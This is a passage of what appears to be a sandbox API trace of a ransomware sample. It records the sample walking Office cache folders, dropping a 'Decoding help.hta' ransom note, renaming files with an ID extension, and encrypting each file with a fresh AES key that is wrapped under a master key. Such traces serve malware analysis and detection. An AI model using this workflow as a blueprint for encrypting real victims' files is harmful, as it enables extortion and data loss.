dwFlags=0x0, pbData=0x47cfbe4*, pdwDataLen=0x47cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x47cfbe4*, pdwDataLen=0x47cfcf8*=0x100) returned 1 [0044.995] CryptEncrypt (in: hKey=0x5d7e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x13ac0000, pdwDataLen=0x47cfce4*=0xd4200, dwBufLen=0xd4200 | out: pbData=0x13ac0000*, pdwDataLen=0x47cfce4*=0xd4200) returned 1 [0045.703] UnmapViewOfFile (lpBaseAddress=0x13ac0000) returned 1 [0045.906] CloseHandle (hObject=0x490) returned 1 [0045.906] CryptDestroyKey (hKey=0x5d7e50) returned 1 [0045.906] CryptReleaseContext (hProv=0x3449df8, dwFlags=0x0) returned 1 [0045.906] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.906] WriteFile (in: hFile=0x48c, lpBuffer=0x47cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x47cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x47cfbe4*, lpNumberOfBytesWritten=0x47cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.907] WriteFile (in: hFile=0x48c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x47cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x47cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.907] CloseHandle (hObject=0x48c) returned 1 [0045.916] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.916] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0045.916] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0045.916] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0045.916] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0045.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0045.916] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AccessMUISet.xml") returned 1 [0045.917] lstrlenW (lpString="AccessMUISet.xml") returned 16 [0045.917] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0045.917] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0045.917] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="AccessMUISet.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" [0045.917] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" [0045.917] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0045.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0045.917] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0045.918] CreateFileMappingA (hFile=0x48c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x490 [0045.918] CryptAcquireContextA (in: phProv=0x47cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x47cfcec*=0x3449df8) returned 1 [0045.918] CryptGenKey (in: hProv=0x3449df8, Algid=0x6610, dwFlags=0x1, phKey=0x47cfce8 | out: phKey=0x47cfce8*=0x5e2830) returned 1 [0045.918] CryptExportKey (in: hKey=0x5e2830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x47cfbe4, pdwDataLen=0x47cfce4 | out: pbData=0x47cfbe4*, pdwDataLen=0x47cfce4*=0x2c) returned 1 [0045.918] MapViewOfFile (hFileMappingObject=0x490, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x2fd0000 [0045.990] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47cfbe4*, pdwDataLen=0x47cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x47cfbe4*, pdwDataLen=0x47cfcf8*=0x100) returned 1 [0045.990] CryptEncrypt (in: hKey=0x5e2830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fd0000*, pdwDataLen=0x47cfce4*=0x320, dwBufLen=0x320 | out: pbData=0x2fd0000*, pdwDataLen=0x47cfce4*=0x320) returned 1 [0045.990] UnmapViewOfFile (lpBaseAddress=0x2fd0000) returned 1 [0045.992] CloseHandle (hObject=0x490) returned 1 [0045.992] CryptDestroyKey (hKey=0x5e2830) returned 1 [0045.992] CryptReleaseContext (hProv=0x3449df8, dwFlags=0x0) returned 1 [0045.992] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.992] WriteFile (in: hFile=0x48c, lpBuffer=0x47cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x47cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x47cfbe4*, lpNumberOfBytesWritten=0x47cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.993] WriteFile (in: hFile=0x48c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x47cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x47cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.993] CloseHandle (hObject=0x48c) returned 1 [0045.995] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.995] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0045.995] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0045.995] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0045.995] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0045.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0045.995] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Setup.xml") returned -1 [0045.995] lstrlenW (lpString="Setup.xml") returned 9 [0045.995] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0045.995] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0045.996] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" [0045.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" [0045.996] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0045.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0045.996] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0045.996] CreateFileMappingA (hFile=0x48c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x490 [0045.996] CryptAcquireContextA (in: phProv=0x47cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x47cfcec*=0x3449df8) returned 1 [0045.997] CryptGenKey (in: hProv=0x3449df8, Algid=0x6610, dwFlags=0x1, phKey=0x47cfce8 | out: phKey=0x47cfce8*=0x5e2b70) returned 1 [0045.997] CryptExportKey (in: hKey=0x5e2b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x47cfbe4, pdwDataLen=0x47cfce4 | out: pbData=0x47cfbe4*, pdwDataLen=0x47cfce4*=0x2c) returned 1 [0045.997] MapViewOfFile (hFileMappingObject=0x490, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa40) returned 0x2fd0000 [0048.144] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47cfbe4*, pdwDataLen=0x47cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x47cfbe4*, pdwDataLen=0x47cfcf8*=0x100) returned 1 [0049.195] CryptEncrypt (in: hKey=0x5e2b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fd0000*, pdwDataLen=0x47cfce4*=0xa40, dwBufLen=0xa40 | out: pbData=0x2fd0000*, pdwDataLen=0x47cfce4*=0xa40) returned 1 [0049.474] UnmapViewOfFile (lpBaseAddress=0x2fd0000) returned 1 [0049.547] CloseHandle (hObject=0x490) returned 1 [0049.547] CryptDestroyKey (hKey=0x5e2b70) returned 1 [0049.547] CryptReleaseContext (hProv=0x3449df8, dwFlags=0x0) returned 1 [0049.547] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.547] WriteFile (in: hFile=0x48c, lpBuffer=0x47cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x47cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x47cfbe4*, lpNumberOfBytesWritten=0x47cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.178] WriteFile (in: hFile=0x48c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x47cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x47cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.050] CloseHandle (hObject=0x48c) returned 1 [0052.596] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.916] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0056.916] FindClose (in: hFindFile=0x5d7e90 | out: hFindFile=0x5d7e90) returned 1 Thread: id = 144 os_tid = 0x320 [0040.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x4c8fd30 | out: lpFindFileData=0x4c8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e10 [0041.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.797] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x4c8fd30 | out: lpFindFileData=0x4c8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.797] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.797] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.797] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x4c8fd30 | out: lpFindFileData=0x4c8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.797] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0041.797] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.797] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.797] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x498 [0041.798] WriteFile (in: hFile=0x498, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4c8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.799] CloseHandle (hObject=0x498) returned 1 [0041.799] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.799] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32WW.msi") returned -1 [0041.799] lstrlenW (lpString="Office32WW.msi") returned 14 [0041.799] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0041.799] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.799] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0041.799] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0041.799] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.023] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0042.023] CreateFileMappingA (hFile=0x4e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e4 [0042.023] CryptAcquireContextA (in: phProv=0x4c8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4c8fcec*=0x344a238) returned 1 [0045.313] CryptGenKey (in: hProv=0x344a238, Algid=0x6610, dwFlags=0x1, phKey=0x4c8fce8 | out: phKey=0x4c8fce8*=0x5d7cd0) returned 1 [0045.313] CryptExportKey (in: hKey=0x5d7cd0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4c8fbe4, pdwDataLen=0x4c8fce4 | out: pbData=0x4c8fbe4*, pdwDataLen=0x4c8fce4*=0x2c) returned 1 [0045.313] MapViewOfFile (hFileMappingObject=0x4e4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x12520000 [0045.783] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4c8fbe4*, pdwDataLen=0x4c8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4c8fbe4*, pdwDataLen=0x4c8fcf8*=0x100) returned 1 [0048.909] CryptEncrypt (in: hKey=0x5d7cd0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x12520000, pdwDataLen=0x4c8fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x12520000*, pdwDataLen=0x4c8fce4*=0x100000) returned 1 [0049.495] UnmapViewOfFile (lpBaseAddress=0x12520000) returned 1 [0049.574] CloseHandle (hObject=0x4e4) returned 1 [0049.574] CryptDestroyKey (hKey=0x5d7cd0) returned 1 [0049.574] CryptReleaseContext (hProv=0x344a238, dwFlags=0x0) returned 1 [0049.574] SetFilePointerEx (in: hFile=0x4e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.574] WriteFile (in: hFile=0x4e0, lpBuffer=0x4c8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4c8fbe4*, lpNumberOfBytesWritten=0x4c8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.095] WriteFile (in: hFile=0x4e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x4c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x4c8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.095] CloseHandle (hObject=0x4e0) returned 1 [0053.110] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.110] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x4c8fd30 | out: 